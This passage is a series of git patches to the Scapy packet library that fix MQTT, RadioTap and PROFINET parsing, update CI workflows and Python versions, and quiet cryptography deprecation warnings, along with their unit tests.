IODReadReq(bytearray.fromhex('0009003c010000010123456789abcdef0123456789abcdef00000001000200030000432100000002000000000000000000000000000000000000000000000000abcdef')) +p == IODReadReq(ARUUID='01234567-89ab-cdef-0123-456789abcdef', seqNum=1, API=1, slotNumber=2, subslotNumber=3, + index=0x4321, block_length=60, recordDataLength=2, padding='\0\0', RWPadding=b'\0'*24 + ) / b'\xab\xcd' / conf.padding_layer(b'\xef') + += IODReadReq response +p = p.get_response() +p == IODReadRes(ARUUID='01234567-89ab-cdef-0123-456789abcdef', seqNum=1, API=1, slotNumber=2, subslotNumber=3, + index=0x4321) + + +#################################################################### + ++ Check IODReadRes + += IODReadRes default values +bytes(IODReadRes()) == bytearray.fromhex('8009003c010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000') + += IODReadRes basic example +bytes(IODReadRes( + ARUUID='01234567-89ab-cdef-0123-456789abcdef', seqNum=1, API=1, slotNumber=2, subslotNumber=3, + index=0x4321)) == bytearray.fromhex('8009003c010000010123456789abcdef0123456789abcdef00000001000200030000432100000000000000000000000000000000000000000000000000000000') + += IODReadRes dissection + +p = IODReadRes(bytearray.fromhex('8009003c010000010123456789abcdef0123456789abcdef00000001000200030000432100000000000000000000000000000000000000000000000000000000ef')) +p == IODReadRes( + ARUUID='01234567-89ab-cdef-0123-456789abcdef', seqNum=1, API=1, slotNumber=2, subslotNumber=3, + index=0x4321, recordDataLength=0, block_length=60, padding=b'\0\0', RWPadding=b'\0'*20 + ) / conf.padding_layer(b'\xef') + + #################################################################### #################################################################### From e4a94fbda3560564fdc6bc337d0ebed28ea5d12c Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 18 Jun 2022 00:59:09 +0200 Subject: [PATCH 0805/1632] Missing tshark flag --- test/contrib/gxrp.uts | 2 ++ 1 file changed, 2 insertions(+) diff --git a/test/contrib/gxrp.uts b/test/contrib/gxrp.uts index 4c381c94958..38a7a2cb195 100644 --- a/test/contrib/gxrp.uts +++ b/test/contrib/gxrp.uts @@ -103,6 +103,7 @@ for p in pkts: assert p[GVRP] is not None = GARP tshark check +~ tshark import tempfile, os pkt = Dot3(dst="01:80:c2:00:00:21")/LLC_GARP(dsap=0x42, ssap=0x42, ctrl=3)/GARP( @@ -119,6 +120,7 @@ os.close(fd) os.unlink(pcapfilename) = GARP tshark check +~ tshark import tempfile, os pkt = Dot3(dst="01:80:c2:00:00:20")/LLC_GARP(dsap=0x42, ssap=0x42, ctrl=3)/GARP( From 07c06ed6d6a09fc53da85c66020c552b3a00b3ed Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Fri, 20 May 2022 18:52:20 -0700 Subject: [PATCH 0806/1632] Adjust MQTTPublish when underlayer is QOS --- scapy/contrib/mqtt.py | 5 +++-- test/contrib/mqtt.uts | 23 ++++++++++++++++++++++- 2 files changed, 25 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/mqtt.py b/scapy/contrib/mqtt.py index 220aaa30bdd..b3af44d8538 100644 --- a/scapy/contrib/mqtt.py +++ b/scapy/contrib/mqtt.py @@ -192,8 +192,9 @@ class MQTTPublish(Packet): lambda pkt: (pkt.underlayer.QOS == 1 or pkt.underlayer.QOS == 2)), StrLenField("value", "", - length_from=lambda pkt: (pkt.underlayer.len - - pkt.length - 2)), + length_from=lambda pkt: pkt.underlayer.len - pkt.length - 2 + if pkt.underlayer.QOS == 0 else + pkt.underlayer.len - pkt.length - 4) ] diff --git a/test/contrib/mqtt.uts b/test/contrib/mqtt.uts index 1f758765bb2..c9a9c7c6eb0 100644 --- a/test/contrib/mqtt.uts +++ b/test/contrib/mqtt.uts @@ -31,6 +31,27 @@ assert(publish[MQTTPublish].length == 4) assert(publish[MQTTPublish].topic == b'test') assert(publish[MQTTPublish].value == b'test') += MQTTPublish + +topicC = "testtopic/command" + +p1 = MQTT( + QOS=1 + ) / MQTTPublish( + topic=topicC, + msgid=1234, + value="msg1" + ) +p2 = MQTT( + QOS=1 + ) / MQTTPublish( + topic=topicC, + msgid=1235, + value="msg2" + ) + +p = MQTT(raw(p1 / p2)) +assert p[1].msgid == 1234 = MQTTConnect, packet instantiation c = MQTT()/MQTTConnect(clientIdlen=5, clientId='newid') @@ -160,4 +181,4 @@ assert MQTTUnsubscribe in u and len(u.topics) == 2 and u.topics[1].topic == b"c/ = MQTTSubscribe u = MQTT(b'\x82\x10\x00\x01\x00\x03\x61\x2F\x62\x02\x00\x03\x63\x2F\x64\x00') -assert MQTTSubscribe in u and len(u.topics) == 2 and u.topics[1].topic == b"c/d" +assert MQTTSubscribe in u and len(u.topics) == 2 and u.topics[1].topic == b"c/d" \ No newline at end of file From 55cc74fd9ebce7c2be3ba77b35960f7707861935 Mon Sep 17 00:00:00 2001 From: bhdrozgn <45441291+bhdrozgn@users.noreply.github.com> Date: Wed, 12 Jan 2022 20:46:05 +0300 Subject: [PATCH 0807/1632] RadioTap fixes: ts/HE/RU/lsig + 802.11 subtypes Fixes to some RadioTap fields: - timestamp - HE - RU - L-SIG 802.11 new tubtypes: - 802.11-2020 Table 9-1 - 802.11ax-2021 Table 9-1 --- scapy/layers/dot11.py | 44 +++++++++++++++++++++++-------------- test/scapy/layers/dot11.uts | 23 +++++++++++++++++++ 2 files changed, 51 insertions(+), 16 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 5ae42536b39..0a04e49253c 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -185,6 +185,9 @@ def answers(self, other): '40MHz_ext_channel_below', 'res5', 'res6', 'res7', 'res8', 'res9'] +_rt_tsflags = ['32-bit_counter', 'Accuracy', 'res1', 'res2', 'res3', + 'res4', 'res5', 'res6'] + _rt_knownmcs = ['MCS_bandwidth', 'MCS_index', 'guard_interval', 'HT_format', 'FEC_type', 'STBC_streams', 'Ness', 'Ness_MSB'] @@ -465,32 +468,38 @@ class RadioTap(Packet): LEShortField("ts_accuracy", 0), lambda pkt: pkt.present and pkt.present.timestamp), ConditionalField( - ByteField("ts_position", 0), + BitEnumField("ts_unit", 0, 4, { + 0: 'milliseconds', + 1: 'microseconds', + 2: 'nanoseconds'}), + lambda pkt: pkt.present and pkt.present.timestamp), + ConditionalField( + BitField("ts_position", 0, 4), lambda pkt: pkt.present and pkt.present.timestamp), ConditionalField( - ByteField("ts_flags", 0), + FlagsField("ts_flags", None, 8, _rt_tsflags), lambda pkt: pkt.present and pkt.present.timestamp), # HE - XXX not complete ConditionalField( ReversePadField( - ShortField("he_data1", 0), + LEShortField("he_data1", 0), 2 ), lambda pkt: pkt.present and pkt.present.HE), ConditionalField( - ShortField("he_data2", 0), + LEShortField("he_data2", 0), lambda pkt: pkt.present and pkt.present.HE), ConditionalField( - ShortField("he_data3", 0), + LEShortField("he_data3", 0), lambda pkt: pkt.present and pkt.present.HE), ConditionalField( - ShortField("he_data4", 0), + LEShortField("he_data4", 0), lambda pkt: pkt.present and pkt.present.HE), ConditionalField( - ShortField("he_data5", 0), + LEShortField("he_data5", 0), lambda pkt: pkt.present and pkt.present.HE), ConditionalField( - ShortField("he_data6", 0), + LEShortField("he_data6", 0), lambda pkt: pkt.present and pkt.present.HE), # HE_MU ConditionalField( @@ -503,12 +512,12 @@ class RadioTap(Packet): LEShortField("hemu_flags2", 0), lambda pkt: pkt.present and pkt.present.HE_MU), ConditionalField( - FieldListField("RU_channel1", [], ByteField, - count_from=lambda x: 4), + FieldListField("RU_channel1", [], ByteField('', 0), + length_from=lambda x: 4), lambda pkt: pkt.present and pkt.present.HE_MU), ConditionalField( - FieldListField("RU_channel2", [], ByteField, - count_from=lambda x: 4), + FieldListField("RU_channel2", [], ByteField('', 0), + length_from=lambda x: 4), lambda pkt: pkt.present and pkt.present.HE_MU), # HE_MU_other_user ConditionalField( @@ -535,10 +544,10 @@ class RadioTap(Packet): ), lambda pkt: pkt.present and pkt.present.L_SIG), ConditionalField( - BitField("lsig_length", 0, 12), + BitField("lsig_length", 0, 12, tot_size=-2), lambda pkt: pkt.present and pkt.present.L_SIG), ConditionalField( - BitField("lsig_rate", 0, 4), + BitField("lsig_rate", 0, 4, end_tot_size=-2), lambda pkt: pkt.present and pkt.present.L_SIG), # TLV fields ConditionalField( @@ -597,8 +606,10 @@ def post_build(self, p, pay): 14: "Action No Ack", }, 1: { # Control + 2: "Trigger", + 3: "TACK", 4: "Beamforming Report Poll", - 5: "VHT NDP Announcement", + 5: "VHT/HE NDP Announcement", 6: "Control Frame Extension", 7: "Control Wrapper", 8: "Block Ack Request", @@ -628,7 +639,8 @@ def post_build(self, p, pay): 15: "QoS CF-Ack+CF-Poll (no data)" }, 3: { # Extension - 0: "DMG Beacon" + 0: "DMG Beacon", + 1: "S1G Beacon" } } diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index 2359068e92a..55d2466e96e 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -399,6 +399,29 @@ f = RadioTap(b"\x00\x00)\x00+@\x08\xa0 \x08\x00\xa0 \x08\x00\x00\xff\xc3$N\x00\x assert f.knownMCS == 0x27 assert f.MCS_index == 10 += RadioTap ts, HE, HE-MU, LSIG + +f = RadioTap(b'\x00\x00^\x00*@\xd0\xa9 \x08\x00\xa0 \x08\x00\xc0\x01\x00\x00\x00\x10\x00|\x15@\x01\xd4\x00\x00\x00\x00\x00x\x10\x01\x00\x00\x00\x00\x00\xa7\x14\xd0\xf9\x00\x00\x00\x00\x16\x00\x11\x03\xf6\xc7\x7f@"+\x00\x00\x98Q\x01\x00\xd0\xd3W\x04\xc8\xc8\xc8\xc8rrrr\x02\x00`\x0b\xd4\x00\xd3\x01\xf6T%\x01\x02\x00\x14\x00\x00\x00\x88B\x82\x00\xd8\xf8\x835\xd3\x06\xf0/t|\xa3\xb4\xf0/t|\xa3\xb4\x00\n\xc0\x00\xac\x10\x00 \x01\x00\x00\x00\xe8^\x98\xc3\x08<\xce\x85\xf4\xc0\xe0/\xb0[\xaf\xb11\x90\x11\xb5\xa8\xa3\x02\x99-\xa0\xcf\x7fE%\x8a\xa8~[\xbe\xe8\xfc\xe5:\xbdBJ\xf3\x8a5\xb3\xed\x88\xde\xdcF\x02\xed\xddc\x0bLN\x02\xcdR\x06\x9b\x9d)\xc2\xdc\xf1\xcd\xe3Pv\xcauP\x1a\xaf_\x0c\x12<\x8f\x999*\x1c\xf7x\xe4>G"\x8d\x91\xd6\xeb\xe5\xf9\xc3Y\xedf\xffg\xf8*\xda\xe9aYb\x92\x8b\x93\xde\'\xe7_N$\xd2;\xe3\xadj\xd6\xeb\xf1p|[\xfe\xc9m\xc2\xe1\xde\xd2\xff\x9e\xdb_\x8d9\x80\xec\xd2\x113\x0fWB\x86\xfec\xd5\xb9\x9b\x07\xb0\xa6\x06\xa5\x07iQ\x80\xa5\x8f\x13I\x98\xcb\xb2\x13\x92\xb3\x00\xac<\xdf\x95|\x0b\x8b{\x1d\x0f4@\x12\xb1r\xbez\x81\xc2dQ\x13,nN\xa5\xf1\xcd$\xba\x97\xb6^\x0c\x141\xad\xde`\x0e\x04u\xb6b1\xd2\xb6\xb3\xcf\x01\xf4jn\x07A\x84\xab\xc1!p\xef\xdf\xe9IP\x9dm\xc6[\x01\xb84X\xe6F%\xf7wW+\x80\xb1\xc3\x99b\x15\x03\x86p\x94m\xd8D\xf5\xef\x176\xd0\xbdb\x12\x93\x02)\xac\xed\xfe\x8d\xbd\xcbyI\xaa\xa1\xae\x95H\x0eh\xcd\xfd\xe0\xe6\xf2U\x03\xf6E\x1d\xce\x82\xf6\x8e4\x12\x8e+\xc8\xadJ8\r\x10/\xca3\xd2\x88|\xd2\xce\x7f\x15k\x81R\x88U\xc4\xdeT\x1d\xcf\'\xf0\'\xb2\xb6\xb3\x84\x02\xc9L\xee\xf6E\x04\xaeF\xb1#\xeb\x17\xd0\n\x00\x1aH2<\xe0\xb3[\x8d\t\xd6\x89[0&P\x17/\x191\x050\xe4\xc0\n_?\xde\x92\xbdC\xa6\xb1\xc2n\x12\x9f\xb5b\x10\xcc\xc3\xfa\xce\xd7\xe0\xf2\xaa\x84\xa2\xe9\xa8\x81S&\xf9\r;\xcc\x81\xa3\x84v\xff\n\xb9?\xbe!]\xb4E]\xac\xbfQ\x1d)2\xee9\x84\xddjq\xb1q\x87ef\xca\x87\xfe\xf6\xcd\xbck#\xad\x03\xe9>\x91]\xf3@\x02\xb4\x8b\xfe\x84z\x88\x83\xf3\xb18N\xf7x\xde\xd6|\xb2p\n\xe4$h\xd5\x10\x15&\xd6O\xdf\xb3y\'\x80[a\xf6f2\x84\xe4\xa9\xe3a\xd0h\x93%\xa5\xd1\x9fX\x94P\x8b\xbc\xf9J"k\xd0\xaf-\xa2\xbf\x1a\xf65\xa8[y\xba\x0b\xaa\x05J9\x93VVM+\x13+;y\xbdJ!@\xab\r\x93\x93\x8c\xd6\xbb\xc2\'\xa0_N\'6\x05\x96"\xef\xd7\xbd4S\x99\xfaf\x05\xf2\xb7\xb9\xe4\x02\xd4\x1f?\x0e\xe7') + +assert f.timestamp == 4191163559 +assert f.ts_accuracy == 22 +assert f.ts_unit == 1 +assert f.ts_position == 1 +assert f.ts_flags.Accuracy and "32-bit_counter" in f.ts_flags +assert f.he_data1 == 51190 +assert f.he_data2 == 16511 +assert f.he_data3 == 11042 +assert f.he_data4 == 0 +assert f.he_data5 == 20888 +assert f.he_data6 == 1 +assert f.hemu_flags1 == 54224 +assert f.hemu_flags2 == 1111 +assert f.RU_channel1 == [200, 200, 200, 200] +assert f.RU_channel2 == [114, 114, 114, 114] +assert f.lsig_data1.length +assert f.lsig_length == 182 +assert f.lsig_rate == 0 + = Reassociation request f = Dot11(b' \x00:\x01@\xe3\xd6\x7f*\x00\x00\x10\x18\xa9l.@\xe3\xd6\x7f*\x00 \t1\x04\n\x00@\xe3\xd6\x7f*\x00\x00\x064.2.12\x01\x08\x82\x84\x0b\x16$0Hl!\x02\x08\x1a$\x02\x01\x0b0&\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x01\x00\x00\x01\x00LD\xfe\xf2l\xdcV\xce\x0b7\xab\xc62\x02O\x112\x04\x0c\x12\x18`\x7f\x08\x01\x00\x00\x00\x00\x00\x00@\xdd\t\x00\x10\x18\x02\x00\x00\x10\x00\x00') assert Dot11EltRSN in f From 165dfae2e69e4aa0f2f283466d248b9f97fb495a Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 17 Jun 2022 22:40:44 +0200 Subject: [PATCH 0808/1632] Update actions in the github workflow --- .github/workflows/unittests.yml | 24 ++++++++++++------------ 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 1d0236a613a..174ff52fbe2 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -13,9 +13,9 @@ jobs: runs-on: ubuntu-latest steps: - name: Checkout Scapy - uses: actions/checkout@v2 + uses: actions/checkout@v3 - name: Setup Python - uses: actions/setup-python@v2 + uses: actions/setup-python@v4 with: python-version: 3.9 - name: Install tox @@ -31,9 +31,9 @@ jobs: runs-on: ubuntu-latest steps: - name: Checkout Scapy - uses: actions/checkout@v2 + uses: actions/checkout@v3 - name: Setup Python - uses: actions/setup-python@v2 + uses: actions/setup-python@v4 with: python-version: 3.9 - name: Install tox @@ -45,9 +45,9 @@ jobs: runs-on: ubuntu-latest steps: - name: Checkout Scapy - uses: actions/checkout@v2 + uses: actions/checkout@v3 - name: Setup Python - uses: actions/setup-python@v2 + uses: actions/setup-python@v4 with: python-version: 3.9 - name: Install tox @@ -98,12 +98,12 @@ jobs: mode: both steps: - name: Checkout Scapy - uses: actions/checkout@v2 + uses: actions/checkout@v3 # Codecov requires a fetch-depth > 1 with: fetch-depth: 2 - name: Setup Python - uses: actions/setup-python@v2 + uses: actions/setup-python@v4 with: python-version: ${{ matrix.python }} - name: Install Tox and any other packages @@ -111,7 +111,7 @@ jobs: - name: Run Tox run: ./.config/ci/test.sh ${{ matrix.python }} ${{ matrix.mode }} - name: Codecov - uses: codecov/codecov-action@v1 + uses: codecov/codecov-action@v2 with: file: /home/runner/work/scapy/scapy/.coverage @@ -123,12 +123,12 @@ jobs: security-events: write steps: - name: Checkout repository - uses: actions/checkout@v2 + uses: actions/checkout@v3 with: fetch-depth: 2 - name: Initialize CodeQL - uses: github/codeql-action/init@v1 + uses: github/codeql-action/init@v2 with: languages: 'python' - name: Perform CodeQL Analysis - uses: github/codeql-action/analyze@v1 + uses: github/codeql-action/analyze@v2 From ef368d64ad6034cac3e5ea805d0f2e7d3173943c Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 17 Jun 2022 23:07:34 +0200 Subject: [PATCH 0809/1632] Update python versions in unittests --- .github/workflows/unittests.yml | 24 ++++++++++++------------ tox.ini | 4 ++-- 2 files changed, 14 insertions(+), 14 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 174ff52fbe2..80ae99acaaf 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -17,7 +17,7 @@ jobs: - name: Setup Python uses: actions/setup-python@v4 with: - python-version: 3.9 + python-version: "3.10" - name: Install tox run: pip install tox - name: Run flake8 tests @@ -35,7 +35,7 @@ jobs: - name: Setup Python uses: actions/setup-python@v4 with: - python-version: 3.9 + python-version: "3.10" - name: Install tox run: pip install tox - name: Build docs @@ -49,7 +49,7 @@ jobs: - name: Setup Python uses: actions/setup-python@v4 with: - python-version: 3.9 + python-version: "3.10" - name: Install tox run: pip install tox - name: Run mypy @@ -63,38 +63,38 @@ jobs: fail-fast: false matrix: os: [ubuntu-latest] - python: [2.7, 3.9] + python: ["2.7", "3.10"] mode: [both] installmode: [''] include: # Linux non-root only tests - os: ubuntu-latest - python: 3.6 + python: "3.7" mode: non_root - os: ubuntu-latest - python: 3.7 + python: "3.8" mode: non_root - os: ubuntu-latest - python: 3.8 + python: "3.9" mode: non_root # PyPy tests: root only - os: ubuntu-latest - python: pypy2 + python: "pypy2.7" mode: root - os: ubuntu-latest - python: pypy3 + python: "pypy3.9" mode: root # Libpcap test - os: ubuntu-latest - python: 3.9 + python: "3.10" mode: root installmode: 'libpcap' # MacOS tests - os: macos-10.15 - python: 2.7 + python: "2.7" mode: both - os: macos-10.15 - python: 3.9 + python: "3.10" mode: both steps: - name: Checkout Scapy diff --git a/tox.ini b/tox.ini index 88a95bf778b..1e2107daaa5 100644 --- a/tox.ini +++ b/tox.ini @@ -3,8 +3,8 @@ [tox] -envlist = py{27,34,35,36,37,38,39,py,py3}-{linux,bsd}_{non_root,root}, - py{27,34,25,36,37,38,39,py,py3}-windows, +envlist = py{27,34,35,36,37,38,39,310,py27,py39}-{linux,bsd}_{non_root,root}, + py{27,34,25,36,37,38,39,310,py27,py39}-windows, skip_missing_interpreters = true minversion = 2.9 From 966b1cead63ed1d4db28c9f4b8dba52475be26bd Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 16 Jun 2022 19:12:36 +0200 Subject: [PATCH 0810/1632] Hide cryptography warnings --- scapy/layers/ipsec.py | 26 +++++++++++++++++++------- scapy/plist.py | 2 +- 2 files changed, 20 insertions(+), 8 deletions(-) diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index de54cd42d93..3a5ea73614e 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -47,6 +47,7 @@ import os import socket import struct +import warnings from scapy.config import conf, crypto_validator from scapy.compat import orb, raw @@ -468,10 +469,6 @@ def decrypt(self, sa, esp, key, icv_size=None, esn_en=False, esn=0): salt_size=3, icv_size=16, format_mode_iv=_salt_format_mode_iv) - # XXX: Flagged as weak by 'cryptography'. Kept for backward compatibility - CRYPT_ALGOS['Blowfish'] = CryptAlgo('Blowfish', - cipher=algorithms.Blowfish, - mode=modes.CBC) # XXX: RFC7321 states that DES *MUST NOT* be implemented. # XXX: Keep for backward compatibility? # Using a TripleDES cipher algorithm for DES is done by using the same 64 @@ -483,9 +480,24 @@ def decrypt(self, sa, esp, key, icv_size=None, esn_en=False, esn=0): CRYPT_ALGOS['3DES'] = CryptAlgo('3DES', cipher=algorithms.TripleDES, mode=modes.CBC) - CRYPT_ALGOS['CAST'] = CryptAlgo('CAST', - cipher=algorithms.CAST5, - mode=modes.CBC) + try: + from cryptography import CryptographyDeprecationWarning + with warnings.catch_warnings(): + # Hide deprecation warnings + warnings.filterwarnings("ignore", + category=CryptographyDeprecationWarning) + CRYPT_ALGOS['CAST'] = CryptAlgo('CAST', + cipher=algorithms.CAST5, + mode=modes.CBC) + # XXX: Flagged as weak by 'cryptography'. + # Kept for backward compatibility + CRYPT_ALGOS['Blowfish'] = CryptAlgo('Blowfish', + cipher=algorithms.Blowfish, + mode=modes.CBC) + except AttributeError: + # Future-proof, if ever removed from cryptography + pass + ############################################################################### if conf.crypto_valid: diff --git a/scapy/plist.py b/scapy/plist.py index a5b63a64d11..f8976991e5d 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -12,7 +12,6 @@ from __future__ import print_function import os from collections import defaultdict -from typing import TYPE_CHECKING from scapy.compat import lambda_tuple_converter from scapy.config import conf @@ -43,6 +42,7 @@ Type, TypeVar, Union, + TYPE_CHECKING, ) from scapy.packet import Packet From 31ee7b9f750a28cb7d4a17a3dda5b903977bcf81 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 18 Jun 2022 13:49:50 +0200 Subject: [PATCH 0811/1632] Also hide cryptography warnings to TLS --- scapy/layers/tls/crypto/cipher_block.py | 53 +++++++++++++++---------- 1 file changed, 31 insertions(+), 22 deletions(-) diff --git a/scapy/layers/tls/crypto/cipher_block.py b/scapy/layers/tls/crypto/cipher_block.py index 64ba291a5a4..efad351f0b7 100644 --- a/scapy/layers/tls/crypto/cipher_block.py +++ b/scapy/layers/tls/crypto/cipher_block.py @@ -7,7 +7,8 @@ Block ciphers. """ -from __future__ import absolute_import +import warnings + from scapy.config import conf from scapy.layers.tls.crypto.common import CipherError import scapy.libs.six as six @@ -19,6 +20,7 @@ CipherAlgorithm) from cryptography.hazmat.backends.openssl.backend import (backend, GetCipherByName) + from cryptography import CryptographyDeprecationWarning _tls_block_cipher_algs = {} @@ -127,6 +129,8 @@ class Cipher_CAMELLIA_256_CBC(Cipher_CAMELLIA_128_CBC): # Mostly deprecated ciphers +_sslv2_block_cipher_algs = {} + if conf.crypto_valid: class Cipher_DES_CBC(_BlockCipher): pc_cls = algorithms.TripleDES @@ -152,27 +156,32 @@ class Cipher_3DES_EDE_CBC(_BlockCipher): block_size = 8 key_len = 24 - class Cipher_IDEA_CBC(_BlockCipher): - pc_cls = algorithms.IDEA - pc_cls_mode = modes.CBC - block_size = 8 - key_len = 16 - - class Cipher_SEED_CBC(_BlockCipher): - pc_cls = algorithms.SEED - pc_cls_mode = modes.CBC - block_size = 16 - key_len = 16 - - -_sslv2_block_cipher_algs = {} - -if conf.crypto_valid: - _sslv2_block_cipher_algs.update({ - "IDEA_128_CBC": Cipher_IDEA_CBC, - "DES_64_CBC": Cipher_DES_CBC, - "DES_192_EDE3_CBC": Cipher_3DES_EDE_CBC - }) + _sslv2_block_cipher_algs["DES_192_EDE3_CBC"] = Cipher_3DES_EDE_CBC + + try: + with warnings.catch_warnings(): + # Hide deprecation warnings + warnings.filterwarnings("ignore", + category=CryptographyDeprecationWarning) + + class Cipher_IDEA_CBC(_BlockCipher): + pc_cls = algorithms.IDEA + pc_cls_mode = modes.CBC + block_size = 8 + key_len = 16 + + class Cipher_SEED_CBC(_BlockCipher): + pc_cls = algorithms.SEED + pc_cls_mode = modes.CBC + block_size = 16 + key_len = 16 + + _sslv2_block_cipher_algs.update({ + "IDEA_128_CBC": Cipher_IDEA_CBC, + "DES_64_CBC": Cipher_DES_CBC, + }) + except AttributeError: + pass # We need some black magic for RC2, which is not registered by default From 40985f13fefb42dc36a741b4c2e2d594bd5f81c8 Mon Sep 17 00:00:00 2001 From: Pierre Date: Sun, 19 Jun 2022 13:45:11 +0200 Subject: [PATCH 0812/1632] Accept bytearray() instances to create packets (#3652) --- scapy/packet.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/scapy/packet.py b/scapy/packet.py index 788ed58936b..807993dae7f 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -128,7 +128,7 @@ def lower_bonds(self): print("%-20s %s" % (lower.__name__, ", ".join("%-12s" % ("%s=%r" % i) for i in six.iteritems(fval)))) # noqa: E501 def __init__(self, - _pkt=b"", # type: bytes + _pkt=b"", # type: Union[bytes, bytearray] post_transform=None, # type: Any _internal=0, # type: int _underlayer=None, # type: Optional[Packet] @@ -151,6 +151,8 @@ def __init__(self, self.init_fields() self.underlayer = _underlayer self.parent = _parent + if isinstance(_pkt, bytearray): + _pkt = bytes(_pkt) self.original = _pkt self.explicit = 0 self.raw_packet_cache = None # type: Optional[bytes] From 654ead664eb57bb713c276b226992a45ff08d36f Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 19 Jun 2022 14:02:52 +0200 Subject: [PATCH 0813/1632] Minor fix in rfc-format gen (#3653) --- scapy/packet.py | 2 +- test/regression.uts | 49 +++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 50 insertions(+), 1 deletion(-) diff --git a/scapy/packet.py b/scapy/packet.py index 807993dae7f..a7e42381f54 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -2428,7 +2428,7 @@ def rfc(cls, ret=False, legend=True): # The last field of above is shared with below if above[-1][2] == below[0][2]: # where the field in "above" starts - pos_above = sum(x[1] for x in above[:-1]) + pos_above = sum(x[1] for x in above[:-1]) + len(above[:-1]) - 1 # where the field in "below" ends pos_below = below[0][1] if pos_above < pos_below: diff --git a/test/regression.uts b/test/regression.uts index 707eaa83aa8..47ed232aac7 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -135,6 +135,55 @@ result = [x.strip() for x in result.split("\n")] output = [x.strip() for x in rfc(IP, ret=True).strip().split("\n")] assert result == output +result = """ + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | CODE | ID | LEN | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | TYPE |L|M|S|RES|VERSI| MESSAGE LEN | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | | DATA | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + + Fig. EAP_TTLS +""".strip() +result = [x.strip() for x in result.split("\n")] +output = [x.strip() for x in rfc(EAP_TTLS, ret=True).strip().split("\n")] +assert result == output + + +result = """ + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + |VERSION| TC | FL | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | PLEN | NH | HLIM | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | SRC | + + + + | | + + + + | | + + + + | | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | DST | + + + + | | + + + + | | + + + + | | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + + Fig. IPv6 +""".strip() +result = [x.strip() for x in result.split("\n")] +output = [x.strip() for x in rfc(IPv6, ret=True).strip().split("\n")] +assert result == output + = Check that all contrib modules are well-configured ~ command list_contrib(_debug=True) From 2b1c7ad6ca3ad42c57bf03c93b36f4f6c18df1fa Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 19 Jun 2022 14:55:27 +0200 Subject: [PATCH 0814/1632] Make cryptography import more generic --- scapy/error.py | 2 +- scapy/layers/ipsec.py | 2 +- scapy/layers/tls/crypto/cipher_block.py | 6 ++++-- 3 files changed, 6 insertions(+), 4 deletions(-) diff --git a/scapy/error.py b/scapy/error.py index bed567c439b..95922b19207 100644 --- a/scapy/error.py +++ b/scapy/error.py @@ -135,7 +135,7 @@ def format(self, record): try: with warnings.catch_warnings(): warnings.simplefilter("ignore") - from cryptography import CryptographyDeprecationWarning + from cryptography.utils import CryptographyDeprecationWarning warnings.filterwarnings("ignore", category=CryptographyDeprecationWarning) except ImportError: diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index 3a5ea73614e..36035b4acac 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -481,7 +481,7 @@ def decrypt(self, sa, esp, key, icv_size=None, esn_en=False, esn=0): cipher=algorithms.TripleDES, mode=modes.CBC) try: - from cryptography import CryptographyDeprecationWarning + from cryptography.utils import CryptographyDeprecationWarning with warnings.catch_warnings(): # Hide deprecation warnings warnings.filterwarnings("ignore", diff --git a/scapy/layers/tls/crypto/cipher_block.py b/scapy/layers/tls/crypto/cipher_block.py index efad351f0b7..116898c259f 100644 --- 